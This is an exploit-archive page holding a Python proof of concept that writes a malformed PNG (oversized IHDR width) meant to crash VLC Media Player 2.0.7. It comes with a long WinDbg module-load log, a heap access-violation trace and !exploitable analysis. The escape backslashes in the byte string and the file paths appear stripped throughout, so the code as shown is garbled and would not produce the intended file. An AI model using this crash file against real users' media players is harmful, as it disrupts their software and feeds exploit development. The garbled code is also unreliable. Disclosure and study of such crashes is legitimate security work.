[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : VLC Media Player 2.0.7 (.png) - Crash PoC
# Published : 2013-07-01
# Author :
# Previous Title : Windows Movie Maker Version 2.1.4026.0 (.wav) - Crash POC
# Next Title : Microsoft Office PowerPoint 2007 - Crash PoC


#!/usr/bin/python

# VLC Media Player 2.0.7 PNG Crash PoC
# Vendor Homepage: http://www.videolan.org/
# Version: 2.0.7
# Tested on: Windows 7 64-bit
# Author: Kevin Fujimoto

# Debug Information:
# Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
# Copyright (c) Microsoft Corporation. All rights reserved.

# *** wait with pending attach
# Symbol search path is: SRV*g:symbols*http://msdl.microsoft.com/download/symbols
# Executable search path is: 
# ModLoad: 00400000 00425000   G:Program Files (x86)VideoLANVLCvlc.exe
# ModLoad: 775b0000 77730000   C:WindowsSysWOW64ntdll.dll
# ModLoad: 750f0000 75200000   C:Windowssyswow64kernel32.dll
# ModLoad: 76100000 76147000   C:Windowssyswow64KERNELBASE.dll
# ModLoad: 623e0000 6240c000   G:Program Files (x86)VideoLANVLClibvlc.dll
# ModLoad: 50420000 5066d000   G:Program Files (x86)VideoLANVLClibvlccore.dll
# ModLoad: 75ab0000 75b50000   C:Windowssyswow64ADVAPI32.dll
# ModLoad: 76170000 7621c000   C:Windowssyswow64msvcrt.dll
# ModLoad: 76150000 76169000   C:WindowsSysWOW64sechost.dll
# ModLoad: 75210000 75300000   C:Windowssyswow64RPCRT4.dll
# ModLoad: 75000000 75060000   C:Windowssyswow64SspiCli.dll
# ModLoad: 74ff0000 74ffc000   C:Windowssyswow64CRYPTBASE.dll
# ModLoad: 76390000 76fda000   C:Windowssyswow64SHELL32.DLL
# ModLoad: 76230000 76287000   C:Windowssyswow64SHLWAPI.dll
# ModLoad: 75dd0000 75e60000   C:Windowssyswow64GDI32.dll
# ModLoad: 75ca0000 75da0000   C:Windowssyswow64USER32.dll
# ModLoad: 760f0000 760fa000   C:Windowssyswow64LPK.dll
# ModLoad: 75bf0000 75c8d000   C:Windowssyswow64USP10.dll
# ModLoad: 71880000 718b2000   C:Windowssystem32WINMM.DLL
# ModLoad: 75590000 755c5000   C:Windowssyswow64WS2_32.dll
# ModLoad: 75300000 75306000   C:Windowssyswow64NSI.dll
# ModLoad: 75730000 75735000   C:Windowssyswow64PSAPI.DLL
# ModLoad: 75750000 75908000   C:Windowssyswow64WININET.DLL
# ModLoad: 75be0000 75be4000   C:Windowssyswow64api-ms-win-downlevel-user32-l1-1-0.dll
# ModLoad: 77580000 77585000   C:Windowssyswow64api-ms-win-downlevel-advapi32-l1-1-0.dll
# ModLoad: 76220000 76224000   C:Windowssyswow64api-ms-win-downlevel-shlwapi-l1-1-0.dll
# ModLoad: 75c90000 75c94000   C:Windowssyswow64api-ms-win-downlevel-version-l1-1-0.dll
# ModLoad: 74df0000 74df9000   C:Windowssystem32version.DLL
# ModLoad: 75a40000 75a43000   C:Windowssyswow64api-ms-win-downlevel-normaliz-l1-1-0.dll
# ModLoad: 75740000 75743000   C:Windowssyswow64normaliz.DLL
# ModLoad: 75310000 75508000   C:Windowssyswow64iertutil.dll
# ModLoad: 75a50000 75ab0000   C:Windowssystem32IMM32.DLL
# ModLoad: 762c0000 7638c000   C:Windowssyswow64MSCTF.dll
# ModLoad: 10000000 10059000   C:WindowsSysWOW64guard32.dll
# ModLoad: 74de0000 74de7000   C:Windowssystem32fltlib.dll
# ModLoad: 755d0000 7572c000   C:Windowssyswow64ole32.dll
# ModLoad: 73d90000 73d9b000   C:Windowssystem32profapi.dll
# ModLoad: 720f0000 72170000   C:Windowssystem32uxtheme.dll
# ModLoad: 73cb0000 73cc3000   C:Windowssystem32dwmapi.dll
# ModLoad: 71f50000 720ee000   C:WindowsWinSxSx86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2comctl32.dll
# ModLoad: 75060000 750e3000   C:Windowssyswow64CLBCatQ.DLL
# ModLoad: 75b50000 75bdf000   C:Windowssyswow64OLEAUT32.dll
# ModLoad: 61070000 610bc000   G:Program Files (x86)VideoLANVLCpluginsaccesslibdshow_plugin.dll
# ModLoad: 5bf20000 5bf3c000   G:Program Files (x86)VideoLANVLCpluginsaudio_outputlibaout_directx_plugin.dll
# ModLoad: 5bf00000 5bf1d000   G:Program Files (x86)VideoLANVLCpluginsaudio_outputlibwaveout_plugin.dll
# ModLoad: 5b850000 5b874000   G:Program Files (x86)VideoLANVLCpluginsvideo_outputlibdirectx_plugin.dll
# ModLoad: 5b830000 5b849000   G:Program Files (x86)VideoLANVLCpluginsmmxextlibmemcpymmxext_plugin.dll
# ModLoad: 5b7f0000 5b82f000   G:Program Files (x86)VideoLANVLCpluginsaccessliblibbluray_plugin.dll
# ModLoad: 59020000 59048000   G:Program Files (x86)VideoLANVLCpluginsaccesslibaccess_bd_plugin.dll
# ModLoad: 57fb0000 58001000   G:Program Files (x86)VideoLANVLCpluginsaccesslibdvdnav_plugin.dll
# ModLoad: 5b7d0000 5b7eb000   G:Program Files (x86)VideoLANVLCpluginsaccesslibaccess_vdr_plugin.dll
# ModLoad: 5b760000 5b77b000   G:Program Files (x86)VideoLANVLCpluginsaccesslibfilesystem_plugin.dll
# ModLoad: 50830000 508ac000   G:Program Files (x86)VideoLANVLCpluginsstream_filterlibstream_filter_httplive_plugin.dll
# ModLoad: 50370000 50420000   G:Program Files (x86)VideoLANVLCpluginsstream_filterlibstream_filter_dash_plugin.dll
# ModLoad: 59060000 5907a000   G:Program Files (x86)VideoLANVLCpluginsaccesslibstream_filter_rar_plugin.dll
# ModLoad: 58040000 58065000   G:Program Files (x86)VideoLANVLCpluginsaccesslibzip_plugin.dll
# ModLoad: 58020000 58039000   G:Program Files (x86)VideoLANVLCpluginsstream_filterlibstream_filter_record_plugin.dll
# ModLoad: 57bb0000 57bda000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibplaylist_plugin.dll
# ModLoad: 50210000 5036f000   G:Program Files (x86)VideoLANVLCpluginsmeta_enginelibtaglib_plugin.dll
# ModLoad: 57b50000 57baa000   G:Program Files (x86)VideoLANVLCpluginslualiblua_plugin.dll
# ModLoad: 500c0000 50202000   G:Program Files (x86)VideoLANVLCpluginsmisclibxml_plugin.dll
# ModLoad: 57cd0000 57ced000   G:Program Files (x86)VideoLANVLCpluginscontrollibhotkeys_plugin.dll
# ModLoad: 57970000 57989000   G:Program Files (x86)VideoLANVLCpluginscontrollibglobalhotkeys_plugin.dll
# ModLoad: 68cf0000 697d9000   G:Program Files (x86)VideoLANVLCpluginsguilibqt4_plugin.dll
# ModLoad: 75510000 7558b000   C:Windowssyswow64COMDLG32.DLL
# ModLoad: 72230000 72281000   C:Windowssystem32WINSPOOL.DRV
# ModLoad: 72330000 72337000   C:Windowssystem32WSOCK32.DLL
# ModLoad: 73da0000 73db7000   C:Windowssystem32userenv.dll
# ModLoad: 72200000 72216000   C:Windowssystem32CRYPTSP.dll
# ModLoad: 72180000 721bb000   C:Windowssystem32rsaenh.dll
# ModLoad: 73a60000 73a6e000   C:Windowssystem32RpcRtRemote.dll
# ModLoad: 507d0000 50828000   G:Program Files (x86)VideoLANVLCpluginsservices_discoverylibupnp_plugin.dll
# ModLoad: 72650000 7266c000   C:Windowssystem32IPHLPAPI.DLL
# ModLoad: 72640000 72647000   C:Windowssystem32WINNSI.DLL
# ModLoad: 57940000 57965000   G:Program Files (x86)VideoLANVLCpluginsservices_discoverylibsap_plugin.dll
# ModLoad: 57160000 5717a000   G:Program Files (x86)VideoLANVLCpluginsservices_discoverylibpodcast_plugin.dll
# ModLoad: 56d90000 56daa000   G:Program Files (x86)VideoLANVLCpluginsservices_discoverylibmediadirs_plugin.dll
# ModLoad: 507b0000 507c9000   G:Program Files (x86)VideoLANVLCpluginsservices_discoverylibwindrive_plugin.dll
# ModLoad: 62da0000 62f0f000   C:Windowssystem32explorerframe.dll
# ModLoad: 62d70000 62d9f000   C:Windowssystem32DUser.dll
# ModLoad: 62cb0000 62d62000   C:Windowssystem32DUI70.dll
# ModLoad: 730c0000 73144000   C:WindowsWinSxSx86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149afcomctl32.dll
# ModLoad: 77c00000 77c40000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibmp4_plugin.dll
# ModLoad: 77bd0000 77bf5000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibavi_plugin.dll
# ModLoad: 77ba0000 77bc2000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibasf_plugin.dll
# ModLoad: 77b80000 77b9b000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibflacsys_plugin.dll
# ModLoad: 50790000 507ab000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibes_plugin.dll
# ModLoad: 69830000 69857000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibmpc_plugin.dll
# ModLoad: 61c90000 61cab000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibnuv_plugin.dll
# ModLoad: 6bbb0000 6bbca000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibtta_plugin.dll
# ModLoad: 675f0000 6760b000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibwav_plugin.dll
# ModLoad: 6aaf0000 6abdb000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibsid_plugin.dll
# ModLoad: 69d90000 69eb8000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibmkv_plugin.dll
# ModLoad: 6ccd0000 6cd86000   G:Program Files (x86)VideoLANVLCpluginsdemuxliblive555_plugin.dll
# ModLoad: 6ef10000 6ef3b000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibogg_plugin.dll
# ModLoad: 70950000 70969000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibdirac_plugin.dll
# ModLoad: 644f0000 6450a000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibsmf_plugin.dll
# ModLoad: 64370000 6438a000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibrawvid_plugin.dll
# ModLoad: 6c2c0000 6c2da000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibpva_plugin.dll
# ModLoad: 6a510000 6a53f000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibts_plugin.dll
# ModLoad: 67f30000 67f4a000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibnsv_plugin.dll
# ModLoad: 6f980000 6f999000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibau_plugin.dll
# ModLoad: 6a6e0000 6a74f000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibgme_plugin.dll
# ModLoad: 6c5e0000 6c5fa000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibvoc_plugin.dll
# ModLoad: 64810000 64829000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibxa_plugin.dll
# ModLoad: 071a0000 072ad000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibmod_plugin.dll
# ModLoad: 66c10000 66c2a000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibaiff_plugin.dll
# ModLoad: 060b0000 060cb000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibimage_plugin.dll
# ModLoad: 77b40000 77b7e000   G:Program Files (x86)VideoLANVLCpluginscodeclibpng_plugin.dll
# (1e8c.1954): Access violation - code c0000005 (!!! second chance !!!)
# eax=072b0048 ebx=00ab0000 ecx=00000000 edx=00000000 esi=072b0040 edi=00ab0000
# eip=775eb6d8 esp=0658daf4 ebp=0658dbc4 iopl=0         nv up ei pl nz na po nc
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
# ntdll!RtlpAllocateHeap+0x7fb:
# 775eb6d8 8b09            mov     ecx,dword ptr [ecx]  ds:002b:00000000=????????
# 0:009> !exploitable -v
# HostMachineHostUser
# Executing Processor Architecture is x86
# Debuggee is in User Mode
# Debuggee is a live user mode debugging session on the local machine
# Event Type: Exception
# *** ERROR: Module load completed but symbols could not be loaded for G:Program Files (x86)VideoLANVLCvlc.exe
# Exception Faulting Address: 0x0
# Second Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
# Exception Sub-Type: Read Access Violation

# Faulting Instruction:775eb6d8 mov ecx,dword ptr [ecx]

# Basic Block:
#     775eb6d8 mov ecx,dword ptr [ecx]
#        Tainted Input Operands: ecx
#     775eb6da mov edx,dword ptr [edx+4]
#     775eb6dd cmp ecx,edx
#        Tainted Input Operands: ecx
#     775eb6df jne ntdll!rtlpallocateheap+0x8e4 (7763af86)
#        Tainted Input Operands: ZeroFlag

# Exception Hash (Major/Minor): 0x65193219.0x71557302

# Stack Trace:
# ntdll!RtlpAllocateHeap+0x7fb
# ntdll!RtlAllocateHeap+0x23a
# msvcrt!_calloc_impl+0x136
# msvcrt!_calloc_crt+0x16
# msvcrt!_getbuf+0x11
# msvcrt!_flsbuf+0x94
# msvcrt!_fputwc_nolock+0xd5
# msvcrt!fputwc+0x51
# vlc+0x5975
# vlc+0x97ee
# vlc+0x700b
# msvcrt!_wsopen_s+0x1b
# msvcrt!_unlock+0x15
# msvcrt!_iob+0x60
# ntdll!ExecuteHandler2+0x26
# Instruction Address: 0x00000000775eb6d8

# Description: Data from Faulting Address controls Branch Selection
# Short Description: TaintedDataControlsBranchSelection
# Exploitability Classification: UNKNOWN
# Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at ntdll!RtlpAllocateHeap+0x00000000000007fb called from msvcrt!_calloc_impl+0x0000000000000136 (Hash=0x65193219.0x71557302)

# The data from the faulting address is later used to determine whether or not a branch is taken.

out = (
       "x89x50x4Ex47x0Dx0Ax1Ax0A" # PNG signature
       "x00x00x00x0D" # IHDR size
       "x49x48x44x52" # IHDR chunk
       "x7FxFFxFFxFF" # width
       "x00x00x01x02" # height
       "x01" # bit depth 
       "x03" # color type
       "x00" # compression method
       "x00" # filter method
       "x00" # interlace method
       "xBAx1BxD8x84" # IHDR chunk CRC
       "x00x00x00x03" # PLTE size
	   "x50x4Cx54x45" # PLTE chunk
	   "xFF" # red
	   "xFF" # green
       "xFF" # blue
	   "xA7xC4x1BxC8" # PLTE chunk CRC
	   "x00x00x00x01" # tRNS size
	   "x74x52x4Ex53" # tRNS chunk
	   "x00" # alpha
	   "x40xE6xD8x66" # tRNS chunk CRC
	   "x00x00x00x01" # IDAT size
	   "x49x44x41x54" # IDAT chunk
	   "xFF" # image data
	   "x05x3Ax92x65" # IDAT chunk CRC 
	   "x00x00x00x00" # IEND size
	   "x49x45x4Ex44" # IEND chunk
	   "xAEx42x60x82" # IEND chunk CRC
	   )

print "Writing file..."

file = open('crash.png', 'wb')
file.write(out)
file.close()

print "File written!"